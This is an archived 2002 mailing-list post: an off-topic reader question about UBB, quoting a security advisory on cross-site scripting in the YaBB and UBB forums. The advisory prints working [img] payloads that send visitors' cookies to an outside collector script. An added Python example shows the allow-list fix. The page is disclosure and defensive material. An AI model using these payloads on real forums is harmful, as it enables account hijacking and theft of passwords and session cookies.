Hi,

Now talking about UBB.. I found out that when I add an Insert Header meta tag in UBB's control panel, it is added twice.... How come?

Greetings from Holland,
Raymond Vrolijk
Programmer
http://www.veronica.nl

----- Original Message -----
From: "Obscure" <obscureat_private>
To: <vulnwatchat_private>
Sent: Wednesday, January 09, 2002 6:35 PM
Subject: [VulnWatch] CSS vulnerabilities in YaBB and UBB allow account hijack [Multiple Vendor]

> Advisory Title: CSS vulnerabilities in YaBB and UBB allow account hijack
> [Multiple Vendor]
> Release Date: 08/01/2002
>
> Application: YaBB and UBB
>
> Platform: Any system supporting PERL.
>
> Build -
> YaBB : 1 Gold - Service Pack 1 - older versions were affected in the same
> way.
> UBB : Ultimate Bulletin BoardTM 6.2.0 Beta Release 1.0
>
> Severity: Malicious users can steal session cookies, allowing administrative
> access to the bulletin board.
>
> Author:
> Obscure^
> [ obscureat_private ]
>
> Vendor Status:
> YaBB - Informed on 01 Jan 2002, should fix some time in the future ...
> UBB - Informed on 08 Jan 2002, should issue a fix on 09 Jan 2002 (seems like
> they knew about the issue).
>
> Web:
>
> http://yabb.xnull.com
> http://www.infopop.com/products/ubb/
> http://eyeonsecurity.net/advisories/css_in_yabb_and_ubb.html
>
> Background.
>
> (extracted from http://yabb.xnull.com)
>
> YaBB is a leading provider of FREE, downloadable Perl forums for webmasters,
> with currently over 50,000 web communities using YaBB worldwide, and over 1
> million registered users throughout these forums! Join the messaging
> revolution; keep visitors coming back....
>
> (extracted from http://www.infopop.com/products/ubb/)
>
> The Ultimate Bulletin Board (UBB)T is the most widely adopted Perl message
> board on the Web. With a solid five year development history, and worldwide
> familiarity, it is easy to use and maintain.
>
> Problem.
>
> When a user inserts [IMG]url[/IMG], YaBB changes that text to <img src='url'>.
> If someone inserts javascript:alert() instead of the url, the javascript code
> is executed by Internet Explorer or some other web browsers. This allows
> stealing of cookie data and other interesting things. YaBB has filtered the
> javascript method, however it does not take into consideration that
> javascript: can be encoded using standard HTML hex and ASCII encoding. Same
> with UBB.
> In UBB I need to encode several strings because they added checking for
> certain keywords such as cookie.
> In my example I change javascript: to javascript:
>
> Exploit Example.
>
> Inserting a new topic (or reply) with the following text will send visitor's
> cookies to Eye on Security. The output is saved to
> http://eyeonsecurity.net/tools/cookies.txt .
> Cookies will contain the password in the case of UBB and a session cookie
> (or encoded password) in YaBB.
>
> -- snap YaBB --
>
> [img]javascript:document.write
> ('<img
> src=http://eyeonsecurity.net/tools/cookie.plx?cookie='+escape(docu
> ment.cookie)+'>')
> [/img].
>
> -- snap YaBB --
>
> -- snap UBB --
>
> [IMG]javascript:document.write
> ('<img%20src=http://eyeonsecurity.net/tools/cookie.plx?
> cookie='+escape(document.cookie)+'>')
> [/IMG]
>
> -- snap UBB --
>
> Fix.
>
> IMG tags should start with http, so that Javascript: and other goodies (play
> with mailto:) are not allowed.
>
> Note.
>
> Other Bulletin Board Systems may also be vulnerable to these attacks.
>
> Disclaimer.
>
> The information within this document may change without notice. Use of
> this information constitutes acceptance for use in an AS IS
> condition. There are NO warranties with regard to this information.
> In no event shall the author be liable for any consequences whatsoever
> arising out of or in connection with the use or spread of this
> information. Any use of this information lays within the user's
> responsibility.
>
> Feedback.
>
> Please send suggestions, updates, and comments to:
>
> Eye on Security
> mail : obscureat_private
> web : http://www.eyeonsecurity.net
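The advisory's point is that filtering the literal string "javascript:" is not enough, because the board decodes HTML entities before the browser sees the URL. The following is an added illustration (not code from YaBB, UBB or the advisory author) of the fix the advisory proposes: decode entities first, then accept only http/https URLs as the [img] source. The function names and the regular expression are this example's own.

```python
import html
import re
from urllib.parse import urlsplit

# Matches [img]...[/img] in either case; the captured group is the raw URL text.
IMG_TAG = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)

# Control characters and whitespace that browsers may skip inside a scheme.
CONTROL_CHARS = re.compile(r"[\x00-\x20\x7f]")


def naive_bbcode_img(text):
    """The weak conversion the advisory describes: the URL is copied into
    <img src='...'> without any check on its scheme (for comparison only)."""
    return IMG_TAG.sub(lambda m: "<img src='%s'>" % m.group(1), text)


def safe_image_url(raw):
    """Return the decoded URL if its scheme is http or https, else None.

    Entities (&#106; or &#x6A; forms) are decoded *before* the check, so an
    entity-encoded scheme cannot slip past a plain string filter, and any
    control/whitespace character left in the URL causes rejection."""
    url = html.unescape(raw).strip()
    if CONTROL_CHARS.search(url):
        return None
    try:
        parts = urlsplit(url)
    except ValueError:
        return None
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return None
    return url


def hardened_bbcode_img(text):
    """Emit <img> only for URLs that pass the allow-list; otherwise leave the
    original [img] text in place, HTML-escaped so nothing else is injected."""
    def repl(match):
        url = safe_image_url(match.group(1))
        if url is None:
            return html.escape(match.group(0))
        return '<img src="%s">' % html.escape(url, quote=True)
    return IMG_TAG.sub(repl, text)
```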
This archive was generated by hypermail 2b30 : Thu Jan 17 2002 - 11:04:04 PST